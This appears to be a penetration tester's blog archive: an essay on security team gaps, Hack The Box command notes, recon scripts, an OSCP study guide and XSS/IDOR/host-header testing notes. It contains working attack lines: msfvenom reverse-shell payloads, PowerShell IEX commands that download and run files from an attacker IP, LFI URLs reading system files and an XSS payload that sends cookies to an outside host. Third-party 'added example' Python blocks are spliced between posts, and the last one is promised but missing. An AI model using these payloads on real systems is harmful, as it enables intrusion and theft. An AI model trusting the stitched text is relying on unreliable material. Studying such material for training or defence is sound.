Saturday, September 24, 2022

Implemented cyber/info security and common gaps - A short analysis from an organizational, technical and management perspective

 

Your opinions are welcomed and appreciated.


Generally, a company has multiple security solutions along with several teams of security professionals, backed by a large budget, to protect the organization's data/information from security breaches. The security teams may include:

1. Penetration Testing Team
2. SOC Team
3. Threat Hunter/Security Researcher
4. DLP Team
5. Compliance Audit Team
6. Third-Party Vendor Management Team
7. Security Owner (project-wise)
8. Phishing Campaign Runner, or a team working on employee security behavior
9. Network Operations Team
etc.

Managing all these teams is a huge budget item for any company. Even with these teams deployed and working on their responsibilities, we see hacks/breaches on a day-to-day basis at different organizations. This calls for analysis from the organization's point of view: where exactly is the gap? Is an additional team required, or do the job responsibilities of the different teams need to change a bit to remediate such gaps? Let's dig a bit to find the answer and the gap.

I've worked in a few of these security teams at multiple organizations and will try to describe the real-world work culture/responsibilities here in short, along with common gaps. Analyzing all the teams would take much longer (which we can discuss if required), so let's look at pentesting.

1. Penetration Testing Team – Generally performs security assessments of assets (applications, infrastructure, network and security devices), either before go-live or on live applications, to identify vulnerabilities before an attacker finds them. The work area also overlaps with vulnerability management and tracking.

Common gaps that can be seen here:

a) Identified vulnerabilities sometimes remain open for a long time (there may be multiple reasons for it, such as dependencies on different teams/technologies, major modifications required in applications, end of support from the OEM, delayed patch releases, no downtime available for the change/upgrade, lack of budget, etc.). This means an identified, existing risk remains open, which may be an easy access point for an attacker.

 

Solution:

· A proper vulnerability management process is required that defines what needs to be done in each case. Prioritize risk/vulnerability remediation based on severity. Fix a time period, such as 20/30/40 days, to remediate critical vulnerabilities, 30-60 days for high, etc. It can vary per organization and asset.

· A retest also needs to be performed after remediation.

· Even when complete remediation is delayed, mitigation with compensating controls can be attempted.

· Sometimes a hard call such as decommissioning the asset has to be taken if no remediation is possible (identifying an alternative solution or creating a new app may be much cheaper than the cost of a data breach).
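The tracking described in the solution above (severity-based deadlines, retest after the fix, compensating controls while a fix is delayed), as an added example that is not the post's own tooling. The Critical (30 days) and High (60 days) windows follow the post's illustrative figures; the Medium/Low windows, the status names and the sample findings are my assumptions.

```python
"""Vulnerability remediation SLA tracker (added example, not from the post)."""
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Dict, List, Optional

# Remediation window per severity, in days. Organization-specific values;
# Critical/High follow the post's ranges, Medium/Low are placeholders.
SLA_DAYS = {"critical": 30, "high": 60, "medium": 90, "low": 180}
SEVERITY_ORDER = ["critical", "high", "medium", "low"]


@dataclass
class Finding:
    finding_id: str
    asset: str
    severity: str
    discovered: date
    remediated: Optional[date] = None            # date the fix was applied
    retested: Optional[date] = None              # date a retest confirmed the fix
    compensating_control: Optional[str] = None   # interim mitigation, if any


def due_date(f: Finding) -> date:
    """Deadline derived from severity and the date the finding was reported."""
    return f.discovered + timedelta(days=SLA_DAYS[f.severity.lower()])


def status(f: Finding, today: date) -> str:
    """Classify one finding for management reporting.

    closed     - fixed and the fix confirmed by a retest
    unverified - fix applied but not yet retested (still counts as open risk)
    mitigated  - past due, but a compensating control is in place
    overdue    - past due with neither a fix nor a compensating control
    open       - still inside its SLA window
    """
    if f.remediated is not None and f.retested is not None:
        return "closed"
    if f.remediated is not None:
        return "unverified"
    if today > due_date(f):
        return "mitigated" if f.compensating_control else "overdue"
    return "open"


def report(findings: List[Finding], today: date) -> Dict[str, List[Finding]]:
    """Group findings by status; within a group, worst severity and earliest
    due date first, which is the order remediation should be chased in."""
    grouped: Dict[str, List[Finding]] = {}
    for f in findings:
        grouped.setdefault(status(f, today), []).append(f)
    for group in grouped.values():
        group.sort(key=lambda f: (SEVERITY_ORDER.index(f.severity.lower()), due_date(f)))
    return grouped


# Constructed sample data for a report dated 24 Sep 2022.
TODAY = date(2022, 9, 24)
SAMPLE_FINDINGS = [
    Finding("F-1", "payments-api", "critical", date(2022, 7, 1)),
    Finding("F-2", "hr-portal", "high", date(2022, 8, 15), remediated=date(2022, 9, 10)),
    Finding("F-3", "legacy-crm", "critical", date(2022, 6, 1),
            compensating_control="WAF rule blocking the vulnerable endpoint"),
    Finding("F-4", "intranet-wiki", "medium", date(2022, 9, 1)),
    Finding("F-5", "build-server", "low", date(2022, 1, 1),
            remediated=date(2022, 3, 1), retested=date(2022, 3, 5)),
]


def sample_statuses() -> Dict[str, str]:
    """Status of each constructed finding as of TODAY."""
    return {f.finding_id: status(f, TODAY) for f in SAMPLE_FINDINGS}


if __name__ == "__main__":
    for state, group in report(SAMPLE_FINDINGS, TODAY).items():
        print(f"== {state} ==")
        for f in group:
            print(f"  {f.finding_id} {f.asset:14} {f.severity:8} due {due_date(f)}")
```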

 

b) Testing environment – Generally the tester performs (or is asked to perform) the test in a non-production environment (possibly due to the high risk of application crashes, tampering with live data, exposure of customer data to the tester, etc.), which in some scenarios amounts to partial testing. (Partial testing – the software code/application may get analyzed in UAT, but the underlying infrastructure associated with the application is not tested, and the configuration of the application in the production environment has not been assessed.) Here the product owner will have confidence that their application is secure, which may be false or only partially true.

 

Solution:

· Build an organization-wide framework which can ensure production environment testing.

· If complete production environment testing is not possible, go with UAT (an exact replica of production) plus partial production testing. Make sure the underlying infrastructure of the application, along with the configuration of the application environment, gets assessed.

c) Pentester experience – In many cases the deployed pentester does not have the required experience/skill set, and may fail to identify even a common security gap.

 

Solution:

· Perform proper due diligence on the deployed vendor/tester.

· Make sure a primary assurance step is implemented, meaning the tester is challenged on the quality of the testing and the report.

 

d) Strict timeline – The number of man-days of testing is limited by the app owner or company to save budget, and because of it the vendor/tester has to submit the report whether or not all the attack surfaces have been analyzed.

 

Solution:

· Again, an organization-wide framework is required to fix the minimum man-days of testing for applications falling under different categories/severities. Here a wide analysis (based on asset type/size, crown jewels analysis, BIA analysis, ...) is required to place applications in different categories and assign man-days of testing accordingly.

 

e) Sometimes senior management remains unaware of the open gaps, or the pentesting team keeps them under a false assurance that everything is running fine, which may result in a big loss at any time.

 

Solution:

· Here it is required to add a knowledgeable person as pentest activity lead, or a pentest assurance team, who can understand the real objective of the complete pentest activity, ensure that the periodic in-depth security assessment/vulnerability management stays on track, and report to management.

 

f) Similarly, a few more gaps can be seen.

 

Identifying the issue/gap is a bigger challenge than finding a solution. I'm open to your comments and ready to discuss / understand the readers' thinking on it.

 

 

 

Wednesday, October 7, 2020

My technical record related to penetration testing, HTB, ...

 

1. Ctrl+Shift+R - reverse search – search the command history in a Linux terminal

2. tmux - a terminal multiplexer for Unix-like operating systems. It allows multiple terminal sessions to be accessed simultaneously in a single window.

 

3. nmap -sV -O -F --version-light 10.10.10.4

a. -sV: Probe open ports to determine service/version info
b. -O: Enable OS detection
c. -F: Fast mode - scan fewer ports than the default scan
d. --version-light: Limit to most likely probes (intensity 2)
e. 10.10.10.4: IP address of the Legacy box

 

4. Check for an exploit on a machine where a shell is already open (required for privilege escalation):

https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-devel/

use post/multi/recon/local_exploit_suggester

then set session 1

This module suggests local Meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform of the session the user has opened, as well as the exploits available in Meterpreter.

 

5. Search for a file on the system where RCE was obtained:

-> search -f user.txt

6. Create the exploit using msfvenom:

-> msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.15 LPORT=4444

-p: Payload to use

-f: Output format

-o: Save the payload to a file

LHOST: Local host

LPORT: Local port

Now upload the file (via put/upload, or download it from a Python HTTP server).

Start listening on multi/handler and then run the uploaded exploit on the victim machine – it will create a session.

 

7. Check for an FTP service with nmap ->
-> nmap -A -p21 -v 10.10.10.5

8. Elastix login portal -> Elastix is a unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a web interface and includes capabilities such as call center software with predictive dialling.

 

Available exploit: Elastix 2.0 - 'graph.php' Local File Inclusion

Payload -> https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

9. SSH connect -> ssh root@10.10.10.7
10. Get details of an exploit with searchsploit -> searchsploit -x 18770.txt
11. If the exploit goes over OpenSSL/HTTPS, a proxy can be set -> set proxies http:127.0.0.1:8080

12. Default wordlist path of DirBuster -> /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

13. Vulnerable vTiger version – 5.4.0 – RCE/CSRF/LFI -> searchsploit vtiger

https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

view-source:https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../../etc/asterisk/manager.conf%00

14. nmap script to get more details from rpcbind -> nmap -sV --script=nfs-showmount -oN remote.nfs remote.htb

15. Mount a backup if an unmounted site backup is available -> sudo mount -o nfsvers=4 -t nfs remote.htb:/site_backups /mnt

16. Start the Apache service -> systemctl start apache2

17. nmap - 80/tcp open  http    HttpFileServer httpd 2.3 -

Exploit - Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)

 

18. Set the payload for a 64-bit system - set payload windows/x64/meterpreter/reverse_tcp

19. Privilege escalation – on Windows 2012 R2 – exploit – MS16-098 – 41020.exe

-> C:\Users\kostas\Desktop>41020.exe

41020.exe

Microsoft Windows [Version 6.3.9600]

(c) 2013 Microsoft Corporation. All rights reserved.

-> C:\Users\kostas\Desktop>cd C:\Administrator\Desktop

-> C:\Users\Administrator\Desktop>type root.txt

20. Command to copy data to the clipboard -> cat abc.txt | xclip

21. Run a server in Kali on port 8000 -> python -m SimpleHTTPServer

22. Run on the victim machine to download the file -> powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.16:8000/exploit.html')"

23. msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.16 lport=4444 -f exe > writeup.exe

24. powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.16:8000/writeup64.exe', 'writeup64.exe')"

25. If Meterpreter is running, check the running processes -> ps

26. Migrate to any running process -> migrate process_ID

27. Unset a set value in Metasploit -> unset parameter

28. ncat -lvnp 4444 -> options: l - listen, v - verbose, n - don't resolve DNS, p - port

29. If you get a user session on the target machine and need to move to admin privileges -> migrate to a stable process on Windows -> 3004  580   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe

-> migrate 3004

30. An exploit on Windows 2003 R2 for admin privilege escalation -- windows/local/ms14_070_tcpip_ioctl

...
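The download-and-execute chain in items 21-24 (a staged file served over HTTP, fetched with a .NET WebClient and run via IEX, or an executable pulled to disk) is what a SOC would want to recognise in process-creation logs. The detection below is an added example, not part of these notes; the event records are constructed and their layout (event id, user, command line) is an assumption, not any particular SIEM's format.

```python
"""Detect the PowerShell download-and-execute pattern from the notes (added example)."""
import re
from typing import Dict, List, Tuple

# Each indicator is one piece of the chain in the notes: a WebClient object,
# a Download* method call, in-memory execution via IEX, and a fetched binary.
INDICATORS = {
    "webclient":  re.compile(r"net\.webclient", re.I),
    "download":   re.compile(r"\.download(string|file|data)\s*\(", re.I),
    "inmem_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "exe_fetch":  re.compile(r"https?://\S+\.(exe|dll|ps1)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}
POWERSHELL = re.compile(r"\bpowershell(\.exe)?\b", re.I)


def analyze(cmdline: str) -> Dict[str, object]:
    """Return the indicators found in one command line and a verdict.

    Verdict rule: a PowerShell command that downloads something AND either
    executes it in memory (IEX) or pulls an executable/script to disk. A
    download alone (an admin script fetching a text file, say) is reported
    but not flagged, so the rule does not fire on every WebClient use.
    """
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    is_ps = bool(POWERSHELL.search(cmdline))
    suspicious = is_ps and "download" in hits and ("inmem_exec" in hits or "exe_fetch" in hits)
    return {"hits": hits, "suspicious": suspicious}


# Constructed sample events: (event id, user, command line). E1/E2 mirror the
# shape of items 22 and 24; E3-E5 are benign activity that must not fire.
SAMPLE_EVENTS: List[Tuple[str, str, str]] = [
    ("E1", "corp\\alice",
     "powershell \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5:8000/stage.html')\""),
    ("E2", "corp\\alice",
     "powershell \"(new-object System.Net.WebClient).Downloadfile('http://10.0.0.5:8000/tool64.exe', 'tool64.exe')\""),
    ("E3", "corp\\bob", "powershell -Command Get-ChildItem C:\\Users"),
    ("E4", "corp\\bob",
     "powershell \"(New-Object Net.WebClient).DownloadString('http://intranet.corp/motd.txt') | Out-File motd.txt\""),
    ("E5", "corp\\carol", "C:\\Windows\\System32\\notepad.exe report.txt"),
]


def scan(events=SAMPLE_EVENTS) -> List[Tuple[str, List[str]]]:
    """Events that meet the verdict rule, with the indicators that matched."""
    flagged = []
    for event_id, _user, cmdline in events:
        result = analyze(cmdline)
        if result["suspicious"]:
            flagged.append((event_id, result["hits"]))
    return flagged


if __name__ == "__main__":
    for event_id, hits in scan():
        print(f"{event_id}: {', '.join(hits)}")
```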

Sunday, June 21, 2020

Recon for security bugs by automation - .bash_script - automation tool


Run the command by automation –
dirsearch(){
python3 ~/tools/dirsearch/dirsearch.py -u "$1" -t "$2" -e "$3"
}   # $1 = URL (-u), $2 = number of threads (-t), $3 = extensions (-e)

Bash program – for automation:
-> nano auto.sh
# iterate over the subdomains returned by the crtsh function below
for domain in $(crtsh "$1"); do
echo "$domain" | tee -a /Desktop/Recon/${1}_22-6-2020.txt
curl -I -s "$domain" | tee /Path/Recon/curlout/${domain}_22-6-2020.txt
done

Web fuzzing for critical files and directories -> nano autoWebFuzz.sh

for domain in $(crtsh "$1"); do
echo "$domain" | tee -a /Desktop/Recon/${1}_22-6-2020.txt
# --sc 200: only keep responses with status 200
wfuzz -c -z file,/Path/Payloads/DirSrc_CritFile.txt --sc 200 "http://$domain/FUZZ" | tee /Desktop/Recon/WebFuzzFileDirout/${domain}_22-6-2020.txt
done

certspotter(){
curl -s https://certspotter.com/api/v0/certs\?domain\=$1 | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u | grep $1
} #h/t Michiel Prins

crtsh(){
curl -s https://crt.sh/?Identity=%.$1 | grep ">*.$1" | sed 's/<[/]*[TB][DR]>/\n/g' | grep -vE "<|^[\*]*[\.]*$1" | sort -u | awk 'NF'
}

dirsearch(){ #runs dirsearch and takes host and extension as arguments
python3 /Path/tool/dirsearch/dirsearch.py -u $1 -e $2 -t 50 -b
}

certnmap(){
curl https://certspotter.com/api/v0/certs\?domain\=$1 | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u | grep $1  | nmap -T5 -Pn -sS -i - -$
}

ipinfo(){
curl http://ipinfo.io/$1
}

crtshdirsearch(){ #gets all domains from crtsh, runs httprobe and then dir bruteforcers
curl -s https://crt.sh/?q\=%.$1\&output\=json | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | httprobe -c 50 | grep https | xargs -n1 -I{} dirsearch -u {} -e $2 -t 50 -b
}
s3ls(){
aws s3 ls s3://$1
}

s3cp(){
aws s3 cp $2 s3://$1
}

Make a permanent tool:

  sudo nano /bin/crtsh
  #!/bin/bash
  curl -s https://crt.sh/?Identity=%.$1 | grep ">*.$1" | sed 's/<[/]*[TB][DR]>/\n/g' | grep -vE "<|^[\*]*[\.]*$1" | sort -u | awk 'NF'

sudo chmod +x /bin/crtsh
nano .profile    -  remove the crtsh function from here
source .profile



Saturday, June 13, 2020

Clipboard stopped working in VirtualBox Kali Linux; display screen size in VirtualBox:

Clipboard stopped working in VirtualBox Kali Linux:

This used to happen when the Guest Additions ISO version mismatches the VirtualBox version or the Extension Pack version; if you update and upgrade, this version mismatch tends to occur.
Solution: Bring all three to the same version. If updating VirtualBox to the latest version, make sure to update the Extension Pack to the same version. Next, update the Guest Additions ISO to the same version from the Devices tab -> Insert Guest Additions CD image (if it is already there, first log in to Kali and unmount/remove the CD image that was added) -> then install.

Installation process -> chmod +x VBoxLinuxAdditions.run
and then -> sudo ./VBoxLinuxAdditions.run

and finally -> sudo reboot


This will solve the clipboard problem.

The Guest Additions ISO is also used to solve the screen size issue in VirtualBox. Without it, screen resizing does not work properly.

Tuesday, March 19, 2019

OSCP Guide - (By Rajesh)

Things Required for OSCP Preparation
A ‘NEVER GIVE UP’ attitude
Basic Linux usage skills
A bit of programming knowledge
Ability to read and understand the flow of public exploits
Creative hacker way of thinking
Lots of interest, patience, and enthusiasm
We will divide the OSCP journey into 2 phases:

Pre-Enrolment
Post Enrolment
Pre-Enrolment
If you are not a newbie in pen testing and are aware of buffer overflow exploitation, you can skip this section and enroll straight away.

For the rest, you need to cover the following aspects:

Basics
Get comfortable using Linux. If you are new to Linux, refer to the Linux command guide http://linuxcommand.org. Practice all the common commands, and refer to the man page for each of these commands.
Pro-tip: If you have more time on your hands and want to learn Linux in a fun way, you can try the wargames here http://overthewire.org/wargames/

If you are not familiar with any programming language, it is highly recommended to learn one. I would recommend learning Python. An awesome, simple tutorial by Vivek Ramachandran is preferable: http://www.pentesteracademy.com/course?id=1
Check out various videos on YouTube on basic concepts such as port scanning, web application testing, etc. Sometimes research on simple concepts gives good ideas on enumeration, e.g., how SSH works, how services run on ports, how sockets work, etc.

Metasploit

Metasploit is a very powerful tool, and it is necessary for all pen testers to know how to use it, especially the Metasploit post-exploitation modules. Refer to the following links:

Vivek Ramachandran’s Metasploit Megaprimer Videos: http://www.securitytube.net/groups?operation=view&groupId=10

Metasploit unleashed by Offensive Security:

https://www.offensive-security.com/metasploit-unleashed/

Usage of Metasploit in the exam is limited to only one machine, but you can still practice it in the labs to learn the tool in depth.

Buffer Overflow

Buffer overflow is a very important concept you should practice, because if you are good at exploiting buffer overflows, you are sure to get the maximum-point machine in the practical exam. But don't worry if you know nothing about buffer overflows. The following steps will not only help you understand the concept of a buffer overflow, but also let you do it by yourself.

1. A quick intro on buffer overflow.

https://www.youtube.com/watch?v=1S0aBV-Waeo

What is a buffer overflow? (very clearly explained). After watching this video, you will get an idea of the concept behind buffer overflows. It will also increase your urge to learn about buffer overflows.

2. Assembly language primer by Vivek Ramachandran. http://www.securitytube.net/groups?operation=view&groupId=5

Don't get bored after seeing assembly language. Just go through the first 2 videos in this series. That is enough for understanding the memory layout.

3. Buffer Overflow Megaprimer by Vivek Ramachandran. http://www.securitytube.net/groups?operation=view&groupId=4 .

An in-depth video on buffer overflows, where it is explained in a very detailed way.

4. Exploit Research Megaprimer by Vivek Ramachandran. http://www.securitytube.net/groups?operation=view&groupId=7

Real-world exploitation of a buffer overflow, which will be very interesting, where the exploitation is explained clearly step by step. You can even try it yourself as mentioned in the video for practice. It's enough to go through the first 5 videos. SEH-based buffer overflows are not required for OSCP.

If you follow the above steps, you will be able to perform buffer overflow exploitation by yourself, 100%.

Many people shy away from preparing for buffer overflows because it helps to exploit only one machine in the exam. But still, it's a very important and interesting concept. I have seen many people fail because of improper preparation on buffer overflows. Moreover, OSCP is not the target. Everything you learn here is for the real world.

Some Valuable Resources

These are some valuable resources which I found very useful in my OSCP preparation. Many of them are now permanent reference resources, even after I have cleared my OSCP.

Enumeration

http://www.0daysecurity.com/penetration-testing/enumeration.html

https://nmap.org/nsedoc/

https://www.youtube.com/watch?v=Hk-21p2m8YY

Shell Exploitation

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

https://netsec.ws/?p=331

Windows Privilege Escalation

http://www.fuzzysecurity.com/tutorials/16.html

https://www.youtube.com/watch?v=kMG8IsCohHA

https://www.youtube.com/watch?v=PC_iMqiuIRQ

https://github.com/GDSSecurity/Windows-Exploit-Suggester

Linux Privilege Escalation

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

https://www.youtube.com/watch?v=dk2wsyFiosg

Privilege escalation recon scripts:

http://www.securitysift.com/download/linuxprivchecker.py

http://pentestmonkey.net/tools/audit/unix-privesc-check

Research and document

OSCP is difficult – have no doubts about that! There is no spoon-feeding here. Refer to all the above references and do your own research on topics like service enumeration, penetration testing approaches, post-exploitation, privilege escalation, etc. Remember, always take notes, as text, in a separate notes file.

Post-Enrolment

Knowledge and expert skills don't come immediately to anyone. They must be worked for. But first, you need to get started! So, if you are anywhere near the idea of attempting the OSCP, just enroll and get started. Once you are comfortable with all the above pre-enrolment topics, you are fully ready to enroll for the OSCP.

The main thing in OSCP is the lab.

OSCP is not about clearing the exam. It’s all about working deeply on labs.

In General,

It’s not about the destination. It’s all about the journey.

So, it is recommended to take the 2- or 3-month lab. A 1-month lab will never be enough for learning. If you have enough time to work dedicatedly on weekdays, you can take 2 months. Else take 3 months minimum.

Once you enroll, you will be given a date when you will receive your materials and lab connectivity pack, approximately 20 days from the date of enrolling.

The period before getting Lab Connections

This period can be used to test your research ideas on other OSCP-lab-like machines.

Refer to the vulnhub machines in the following link.

http://www.abatchy.com/2017/02/oscp-like-vulnhub-vms.html

The VMs in the above link are OSCP-like VMs. Generally, CTFs are different from the vulnerable machines in the OSCP labs. CTFs have a puzzle-like approach, whereas the OSCP lab machines are more like a real-world simulation.

The VMs in the above link will be like the OSCP labs. You can start solving these VMs. For the VulnHub VMs, there are walkthroughs for each machine. Try each machine first by yourself. Otherwise, read the walkthrough, understand it, and then try to implement the method again in the VM.

Also, try this https://www.hackthebox.gr/

It is also a network which has machines like the OSCP labs.

Document all your steps and take notes of every new concept you learned.

Welcome to OSCP

You will get your training materials (in PDF), video materials, and lab connectivity pack via email. The link for the PDF and videos will expire in 2 days. You should download and back them up before that. Check your lab connectivity as mentioned in the lab connectivity guide. Don't start diving into the labs immediately. Follow the steps given below once you receive the email.

Go through the video material
Go through the pdf completely
Do the exercises in the PDF and document them.
Most people only go through the videos and then start the labs. But that is the biggest mistake. The PDF has a lot more than what is mentioned in the videos. Do not get bored going through all the material and doing the exercises. Remember the proverb by Abraham Lincoln.


The exercises in the PDF help in sharpening one's axe. I found some useful tips and tricks in them whenever I got stuck in the lab exercises.

What’s more, you will get an additional 5 points for submitting exercise documentation.

Let the Hacking Begin

Now comes the main part of OSCP: the labs. The lab environment consists of 55 machines, each with a different approach and a different difficulty level. The lab infrastructure has 4 networks: Public, IT, Development, and Admin. You will get direct access only to the public network. You need to unlock the other networks with the secret keys obtained by proper post-exploitation. You will be connected to the other networks by port forwarding and proxy chaining. The lab is the place where you try out all your research ideas and various tools.

Before starting the lab machines, go through the buffer overflow exploitation in the video material 2-3 times and practice the same on the dedicated Windows 7 machine provided along with the lab machines. The same tools explained in the material will be there on your Windows 7 machine. Practice buffer overflow by following the same steps used by the instructor.

Exploiting a machine is a Systematic Process:

Find the open ports and services running on ports
Enumerate the services and the machine
Exploit the correct vulnerability and gain access
Do proper post exploitation enumeration
Privilege Escalation
For some machines, you will get direct admin/root/system access at the initial stage itself. But you still need to do proper post-exploitation enumeration on that machine, because in the labs the information gathered during post-exploitation on one machine will be used to solve another one.

There are 4 main difficult machines in the OSCP lab, called Pain, Sufferance, Humble and Gh0st. Their nature is as per their names. I gained a lot of confidence after solving these machines.

You need to give your maximum dedication in the labs. Do the research, lots and lots of research. Try all kinds of possibilities, try stupid things. Google is your friend. Always use Google, at any point and on every machine. Google everything that is in front of you. You will experience lots and lots of pain, frustration, etc. Many times you may lose your patience. But NEVER GIVE UP!

Try Harder. If you get stuck and don't know how to proceed, you can visit the OffSec student forums

https://forums.offensive-security.com/

Log in with your OS ID and navigate to the lab machine discussion. You will find some useful hints.

Also, you can join the Slack team https://netsecfocus.slack.com and request to be added to the OSCP channel. You can get some useful ideas there.

But nowhere will anyone give you a direct solution for any of the lab machines. You will only get a small hint and some suggestions. You must figure out the solution by yourself.

Remember, enumeration is the key to OSCP. It took me 2 months to understand the exact meaning of enumeration. Never get excited to exploit any machine at first. Do not follow the approach of monkey testing and blindly downloading and running exploits. Trust me, this approach will make you fall into a rabbit hole. There will be some decoy vulnerabilities to trick you in the wrong direction.

So, what is the approach?

Only with proper enumeration can you successfully exploit any target.

Do a full port scan on the target.
Refer to Fyodor's DEF CON video "Nmap: Scanning the Internet" https://www.youtube.com/watch?v=Hk-21p2m8YY

Enumerate every port. Find out what service is running. If you are unaware, simply Google the port. Also refer to the article below.
http://www.0daysecurity.com/penetration-testing/enumeration.html

After understanding the target, try to find vulnerabilities. Some targets might be exploitable in more than one way.
If you find a vulnerability, read about that vulnerability. Many of the exploits will not work without modification. So, learn the vulnerability and read the exploit carefully. Sometimes there will be another, manual way of exploiting the vulnerability instead of using public exploits. So, Google a lot. Pages not listed at the top will also have some useful stuff. Refer to all pages.

In some cases, the machine might be busy since other students will also be working on it. So, revert the machine and try again. Look for attacks on the vulnerability online. There will be many blogs written on how to exploit that vulnerability.

Once you gain access to the system, always upgrade your shell. Enumerate well. Search for misconfigurations and credentials, and try to use the credentials wherever possible.

It is not required to solve all the machines to take the exam; it's for enhancing your pentest skills. I'd recommend getting at least 25+ targets and 2 of the four difficult ones. If you can't solve that many target machines, then you probably need to extend the labs and keep working on it.

Document all your lab work and take notes of everything that you learned. Submitting the lab report will give you an additional 5 points.

The Exam

Once you are confident enough after working in the labs, you can take the exam. Make sure you schedule your exam date at least 1 month in advance.

You need proper sleep, food, and regular breaks during the exam, because your brain needs to function 2-3 times more creatively and spontaneously than usual.

Grab all your notes and lab notes and make a revision before starting.

Metasploit usage is restricted in the exam. You should use it only once. So, use it wisely.

Never lose your patience and stay calm. Enumerate, enumerate, and enumerate. Never leave anything out. Try all the stupid things. Do not panic. Assume you are working in the lab.

After completing the exam, you will be given 1 day to prepare the report and send it to them. There will be a report template in the reporting guide. You can use your own report format as well. Read the OffSec reporting guide carefully before starting the report, and send it in the exact format and the way they mention.

Tips for Exam

Be confident
Be very cool and calm
Never worry if you didn't get access to one or two machines in a short time as mentioned in other blogs
Enumerate well
Take regular breaks. Go for a small walk and get some fresh air.
Take screenshots and POCs immediately after each exploitation step.
Submit the flags (local.txt & proof.txt) in the exam panel immediately once you retrieve them
I have seen many people fail in the exam once they lose their patience. So never get tense. Always be calm and relaxed. TRY HARDER!

Conclusion

OSCP is not just a certification. It is an awesome journey which teaches you many things apart from the technical perspective. It will teach you to think creatively, develop a ton of patience, and most of all, to 'NEVER GIVE UP'.



(#1) Kioptrix: 2014 https://www.vulnhub.com/entry/kioptrix-2014-5,62/
(#2) FristiLeaks: 1.3 https://www.vulnhub.com/entry/fristileaks-13,133/
(#3) Stapler: 1 https://www.vulnhub.com/entry/stapler-1,150/
(#4) VulnOS: 2 https://www.vulnhub.com/entry/vulnos-2,147/
(#5) SickOs: 1.2 https://www.vulnhub.com/entry/sickos-12,144/
(#6) Brainpan: 1 https://www.vulnhub.com/entry/brainpan-1,51/
(#7) HackLAB: Vulnix https://www.vulnhub.com/entry/hacklab-vulnix,48/
(#8) /dev/random: scream https://www.vulnhub.com/entry/devrandom-scream,47/
(#9) pWnOS: 2.0 https://www.vulnhub.com/entry/pwnos-20-pre-release,34/
(#10) SkyTower: 1 https://www.vulnhub.com/entry/skytower-1,96/

Related Security Tests - XSS, IDOR, Host Header Attack

Information gathering:

1. Site
2. Subdomains -> virustotal.com
3. IP address -> ping any.com
4. Find the programming language of the website:
Google search – site:any.com .jsp/aspx/php/asp/jspx...
Kali – whatweb any.com (and look at X-Powered-By)
5. Open ports and services:
nmap domain/ip
nmap ip -Pn (if the ping probe is blocked in a normal scan)
Aggressive scan: nmap ip -sV (if blocked, append -Pn at the end)
Detailed scan: nmap ip | nmap -sC ip
6. Server info:
whatweb any.com or ssltest.com (many more things in the signature)


Intruder in Burp Suite:

Attack type – Sniper – (applies the payload to a single parameter, where the payload marker is set)
Battering Ram – (one payload is applied to all the marked parameters)
Load the payload list and check for a 200 status after browsing (try with the URL-encoding option checked, and again with URL encoding unchecked)

XSS:
prompt.ml -> a website to practice XSS with different challenges/payloads
Find a parameter which is reflected back -> test it manually or send payloads through Intruder
With Intruder and a loaded payload list -> at payload 0 (no payload) the response length is small, so a payload that gets executed will have a length greater than the payload-0 one; or it may exist at a lower length as well.

URL redirection -> <script>document.location.href="http://bing.com"</script>
Phishing: <iframe src="http://bing.com"></iframe>
Cookie stealing: <script>alert(document.cookie)</script>
<script>document.location.href="http://bing.com/p/?page="+document.cookie</script>
Through file uploading -> if a file upload option is available and the file name is visible in the source code after uploading (the file name is reflected), then there may be XSS. Apply the XSS payload in the name of the file and check.

IDOR – Insecure Direct Object Reference

Log in with account A -> Edit profile A -> capture the user ID, suppose abcd
Log in with account B -> Edit profile B -> pass the user ID of A here and forward -> now check the changes in account A

The user reference can also be changed in the URL.





Host Header Attack: Open Redirection
Check the status code = 200, 201, 202, ... or 300, 301, ... (2XX or 3XX)
Below the GET method:
1. Capture the request -> Host: replace the real website with a test website like bing.com
If it redirects to bing.com, then there is a host header attack.
2. Change realweb.com to bing.com and set X-Forwarded-Host to realweb.com
like – Host: bing.com
X-Forwarded-Host: realweb.com
3. Vice versa of point 2

Host Header Attack: Web Cache Poisoning

4. Change the Host as above - Host: bing.com
In the response, if bing.com is visible in an href, then there is web cache poisoning.
In the browser, the response will appear as a link. When it is clicked in the UI, it will redirect to bing.com.

Host Header Attack: Password Reset Page

5. Suppose a website sends a password reset link for resetting the password.

An attacker changes the host in this link in the mail. Now when the user tries to change the password, this won't work (the host in the URL is different), but the attacker will get the requested link (the password reset link) in their log and can change the user's password by manually changing the URL host in that link.
Reference - (These contents are part of notes prepared by me from multiple sources. Major parts are taken from Vikash Chaudhary's course on Udemy (for more details, visit this course on Udemy).)
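The common fix for all three host header cases above (open redirection, web cache poisoning, password reset links) is to never build URLs from the incoming Host or X-Forwarded-Host and to reject requests for hosts the application does not serve. The following is an added example, not from these notes or the course they cite; ALLOWED_HOSTS, CANONICAL_HOST and the function names are my assumptions, and headers are passed as a dict of lower-cased name -> value.

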